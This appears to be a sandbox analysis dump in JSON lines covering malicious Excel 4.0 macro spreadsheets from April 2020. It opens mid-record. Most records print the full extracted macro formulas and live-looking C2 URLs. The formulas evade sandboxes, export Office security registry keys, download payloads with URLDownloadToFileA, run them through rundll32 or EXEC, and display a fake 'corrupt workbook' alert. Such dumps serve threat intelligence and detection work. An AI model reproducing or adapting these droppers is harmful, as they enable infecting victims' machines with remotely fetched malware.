corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"DOGOngNwdg\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"27d4c0027af79d1656db60edfc58a04a55dcfb377c9b7b62c2afd0b895c9d213"},"analysis":{"reported":"2020-04-09T16:15:26Z","score":10},"files":[{"filename":"27d4c0027af79d1656db60edfc58a04a55dcfb377c9b7b62c2afd0b895c9d213","filesize":113664,"md5":"0eaa46480ef653f5bb8c0290939bbe79","sha1":"44a253ff61d9020033623b4eb2fc3ffa21442a3d","sha256":"27d4c0027af79d1656db60edfc58a04a55dcfb377c9b7b62c2afd0b895c9d213","sha512":"a0e988d1b152c33f8a49a3be67ef7406113f39975b89a6d6cce4010114679184738de6c5b9b5c355cfef9d282932b555cef54e5a9210300f1a1c596997410361","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"27d4c0027af79d1656db60edfc58a04a55dcfb377c9b7b62c2afd0b895c9d213.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://murreeweather.com/wp-content/white/444444.png","http://batilservice.xyz/wp-content/uploads/2020/02/white/444444.png","http://tubolso.cl/wp-content/uploads/2020/02/white/444444.png","http://freespacemarketing.com/wp-content/uploads/2020/02/white/444444.png"],"attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nCALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://murreeweather.com/wp-content/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0)\nIF(R$6C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://batilservice.xyz/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$7C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://tubolso.cl/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$8C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://freespacemarketing.com/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$9C$0\u003c0,CLOSE(FALSE),)\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)\nEXEC(\"c:\\Users\\Public\\jkqnrlvkrq.exe\")\nCLOSE(FALSE)\nRETURN()\nWORKBOOK.HIDE(\"nUFCDz5vmi\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"27e0045ee9c3bc27c9453954533d7fefe7050e98257d7a57b3a653e6d0f9222c"},"analysis":{"reported":"2020-04-09T16:15:26Z","score":10},"files":[{"filename":"27e0045ee9c3bc27c9453954533d7fefe7050e98257d7a57b3a653e6d0f9222c","filesize":206336,"md5":"6e96a237e827260d081fc965fe5baf3d","sha1":"891d5fc77fd786c405e17d955d256b10baade0c4","sha256":"27e0045ee9c3bc27c9453954533d7fefe7050e98257d7a57b3a653e6d0f9222c","sha512":"6a5f9af6b7f4a725fcced41fa1368f7a62dd3059b97a05ee486953e4d3660aa82750f2a9d79f05e1e0af31b4646bbb641bb836844841e54f932ff77530110154","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"27e0045ee9c3bc27c9453954533d7fefe7050e98257d7a57b3a653e6d0f9222c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"hvwXJjdLlX\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"27eb3ba02f492c3c073e80c8788bea0c31d778dbc83aac9c7c6c99845b8d5fc3"},"analysis":{"reported":"2020-04-09T16:15:26Z","score":10},"files":[{"filename":"27eb3ba02f492c3c073e80c8788bea0c31d778dbc83aac9c7c6c99845b8d5fc3","filesize":185344,"md5":"ad0dfa7d99ca6bc86ce7f303ce12d1d4","sha1":"82bf237b23896ab21efe020785f51fd70601b85f","sha256":"27eb3ba02f492c3c073e80c8788bea0c31d778dbc83aac9c7c6c99845b8d5fc3","sha512":"9020cb67b8522b2f488bbf2b42275a8ce1787ff0dde91d564f7285093fb9f79f2439e4af57bc4198a8f85f2e89071faec8ce4ef67d8ce1082b7de4eefe1b4683","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"27eb3ba02f492c3c073e80c8788bea0c31d778dbc83aac9c7c6c99845b8d5fc3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"28033c37c8b8e100c81cef87e144aa2d18f4a8de07b50c3c884b05d566fde97f"},"analysis":{"reported":"2020-04-09T16:15:26Z","score":10},"files":[{"filename":"28033c37c8b8e100c81cef87e144aa2d18f4a8de07b50c3c884b05d566fde97f","filesize":185344,"md5":"a8fec368da61f0a9f2f38227a5c66f5d","sha1":"f92542dfa292d9df106389633b23975cf968d12a","sha256":"28033c37c8b8e100c81cef87e144aa2d18f4a8de07b50c3c884b05d566fde97f","sha512":"3827c68b3ea3c3b73ba2de3cef91155724e198a8dc4d0a3d820160d70348174f00c1b2438c233b438437c5bf0b7b595527f572749f15673b3f0b66c7aab67c5d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"28033c37c8b8e100c81cef87e144aa2d18f4a8de07b50c3c884b05d566fde97f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"28077a6407b528c266f10f3750c5fada8bf61a114bc3c27069acc4f86e7820b8"},"analysis":{"reported":"2020-04-09T16:15:26Z","score":10},"files":[{"filename":"28077a6407b528c266f10f3750c5fada8bf61a114bc3c27069acc4f86e7820b8","filesize":120320,"md5":"86119199f969ae7ed7df3d9b58d44f76","sha1":"002df2b21af639a7264eceb9947404e4d1fc3edc","sha256":"28077a6407b528c266f10f3750c5fada8bf61a114bc3c27069acc4f86e7820b8","sha512":"0bed34dcb7669eeea1c836165bab20565e2196d74d404fab0873fa9adbd485cff432233c3a3273efecdad056016627525fcb058daf16b1fb39dce67a568a61cd","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"28077a6407b528c266f10f3750c5fada8bf61a114bc3c27069acc4f86e7820b8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rosannahtacey.xyz/vg43"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rosannahtacey.xyz/vg43\",\"c:\\Users\\Public\\bmjn5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bmjn5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"t5qgWEcQSM\",TRUE)\nGOTO(R$1C$10)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\nFOPEN(\"c:\\users\\public\\1.reg\")\nFPOS(FOPEN(\"c:\\users\\public\\1.reg\"),215)\nFILE.DELETE(\"c:\\users\\public\\1.reg\")"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"28177ad30eebb235197b54a1d0a92a48b64ba5f9d0114e476f5e842f423bcb3d"},"analysis":{"reported":"2020-04-09T16:15:26Z","score":10},"files":[{"filename":"28177ad30eebb235197b54a1d0a92a48b64ba5f9d0114e476f5e842f423bcb3d","filesize":225280,"md5":"0cac1712d53cd83bfdcbde8b3dbdb45c","sha1":"6f66ad0355556724b024673d24636787d6112c7e","sha256":"28177ad30eebb235197b54a1d0a92a48b64ba5f9d0114e476f5e842f423bcb3d","sha512":"9d790b253cc370184105baacfe052f2f1f0495bd292280a7bb1380293ae7ad08bb3b80c8bc34781cc70bfe8e160ddce0d5ee51f642fd8ec1d6fc4ca47366396d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"28177ad30eebb235197b54a1d0a92a48b64ba5f9d0114e476f5e842f423bcb3d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amberlessard.xyz/brg2sv"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amberlessard.xyz/brg2sv\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"bcu3Mje6xR\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"281d5a1335417a5ba134aea68c94e138b75cca8908bbb32a3e184e23ac1e46d0"},"analysis":{"reported":"2020-04-09T16:15:26Z","score":10},"files":[{"filename":"281d5a1335417a5ba134aea68c94e138b75cca8908bbb32a3e184e23ac1e46d0","filesize":170496,"md5":"27206d923b5e1e4668426a20b8befb9d","sha1":"5699b1c5f7e76a59ca219fa4fd996473d03ae691","sha256":"281d5a1335417a5ba134aea68c94e138b75cca8908bbb32a3e184e23ac1e46d0","sha512":"bb6edfaf2af465a3de8c1f65d9a3ce303db17b99a8374f7b2f963a6e1838344a60c7a559d4fff10361ee2be87b7f8476813ca28f5f0f703a8c3c81cc6551c927","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"281d5a1335417a5ba134aea68c94e138b75cca8908bbb32a3e184e23ac1e46d0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Iu56uKlaka\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"281dd0711a5b3f8a0eee1a6ab5992d7a6161ecb08bafcc52f0c4133f6ab8738c"},"analysis":{"reported":"2020-04-09T16:15:27Z","score":10},"files":[{"filename":"281dd0711a5b3f8a0eee1a6ab5992d7a6161ecb08bafcc52f0c4133f6ab8738c","filesize":214528,"md5":"19fa651a8b372e007e430a9015653482","sha1":"a5560963971d4895f9b13d3caeaf1c4549aebbc9","sha256":"281dd0711a5b3f8a0eee1a6ab5992d7a6161ecb08bafcc52f0c4133f6ab8738c","sha512":"1c57f40a596255150383922271659e39aa4cb25704a56e7d191d14738d147819410328b1d71ccd702673ef7ff819d0762480369c53dbc89644978e289723eef6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"281dd0711a5b3f8a0eee1a6ab5992d7a6161ecb08bafcc52f0c4133f6ab8738c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv43g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv43g\",\"c:\\Users\\Public\\bug75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"upAzGDwriq\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2823dead9319e5fa860b6b4654afed6317b9e69fe59f4107d8a9ab61901894d1"},"analysis":{"reported":"2020-04-09T16:15:27Z","score":10},"files":[{"filename":"2823dead9319e5fa860b6b4654afed6317b9e69fe59f4107d8a9ab61901894d1","filesize":185344,"md5":"e4eb3b075bc2b114712bda151f7ee360","sha1":"68ab2b36ba3f2c69ecdb12b641b812f211984225","sha256":"2823dead9319e5fa860b6b4654afed6317b9e69fe59f4107d8a9ab61901894d1","sha512":"7e70405036a298f6cf3b25253c2c3cdfc8719ff50806ae171d6312fc51eb062f151b8ebe8345952ff079c52e4f41ae2d7ab0f3b4173cb713196c2d3c18efbfac","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2823dead9319e5fa860b6b4654afed6317b9e69fe59f4107d8a9ab61901894d1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/DVkjbsdv37"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2827e9f853808822a3dc78544196abd223b329e68d0f56095457bcaf8d39d569"},"analysis":{"reported":"2020-04-09T16:15:27Z","score":10},"files":[{"filename":"2827e9f853808822a3dc78544196abd223b329e68d0f56095457bcaf8d39d569","filesize":209408,"md5":"7af75dd3ac811a230407c7b7e2abe1da","sha1":"4379f8c9ea534df78b4753648d97cb1f9dde2ca9","sha256":"2827e9f853808822a3dc78544196abd223b329e68d0f56095457bcaf8d39d569","sha512":"1f3042e1c821d2bff39f865a97ac8e3111548f23cdd1db20ee8d9964553e851cb4b7f27f923dff96f78537651d0909bb207acc8a598e41ec49bbc15ea64fba21","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2827e9f853808822a3dc78544196abd223b329e68d0f56095457bcaf8d39d569.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://paxtontranter.xyz/rv24t2"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://paxtontranter.xyz/rv24t2\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"VCJW1l0MiM\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"28280181a1bb893b76ed406c7e6fe36c223f466c3cd1073794ecb67ac3f24b8e"},"analysis":{"reported":"2020-04-09T16:15:27Z","score":10},"files":[{"filename":"28280181a1bb893b76ed406c7e6fe36c223f466c3cd1073794ecb67ac3f24b8e","filesize":226304,"md5":"9b250e87c0b1cb9339523369bbc57acb","sha1":"15c973aa4fb0035f1cfe5273ddf0839b4861f812","sha256":"28280181a1bb893b76ed406c7e6fe36c223f466c3cd1073794ecb67ac3f24b8e","sha512":"e54202bdccf7f80298b8565a731de2607d867668d337975aaab2dca729301676628f65464b02361285ec08806e0abca893a665fb7ccb7d99072addf181be3ca9","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"28280181a1bb893b76ed406c7e6fe36c223f466c3cd1073794ecb67ac3f24b8e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://ddfspwxrb.club/fb2g424g"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\bwep5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"tbmtkqOsUP\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"28454824722ac1113300c90383091b8fc066a975a15d476b5347dba2dfe047f3"},"analysis":{"reported":"2020-04-09T16:15:27Z","score":10},"files":[{"filename":"28454824722ac1113300c90383091b8fc066a975a15d476b5347dba2dfe047f3","filesize":206336,"md5":"c28abe870fef295e797005dab5c4f064","sha1":"70b2a51565edf5feff3676472d03c47343f66382","sha256":"28454824722ac1113300c90383091b8fc066a975a15d476b5347dba2dfe047f3","sha512":"d9b07858b98fb9a16a660eb902b2570f41701544318c81a5a7fbae5ec6441dc41ad85bb76da8ebfebfce144efaa5f7b09763468b9b68c3b4dd409c4e9d5a1a7a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"28454824722ac1113300c90383091b8fc066a975a15d476b5347dba2dfe047f3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"154WGqjPyz\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"285bc7097ef03ebe7075de67cda0633550adfe58438d7d7eea431ac39690972f"},"analysis":{"reported":"2020-04-09T16:15:27Z","score":10},"files":[{"filename":"285bc7097ef03ebe7075de67cda0633550adfe58438d7d7eea431ac39690972f","filesize":167936,"md5":"f67ec189ef4d74c3f70b7d4019c6d078","sha1":"a23807819930fa25ad1460aa4090d4a96f41ca7b","sha256":"285bc7097ef03ebe7075de67cda0633550adfe58438d7d7eea431ac39690972f","sha512":"c2a13388e1794c3ac2088e822da14ae5731ce889975cc224f61132176c6ad709bb482c2b952ed622e8545fa6741627b97b902090a50dd5cb5da8ad02dd4cdff7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"285bc7097ef03ebe7075de67cda0633550adfe58438d7d7eea431ac39690972f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"8mEL0c1VtY\",TRUE)\nGOTO(R$0C$19)"}}}]}
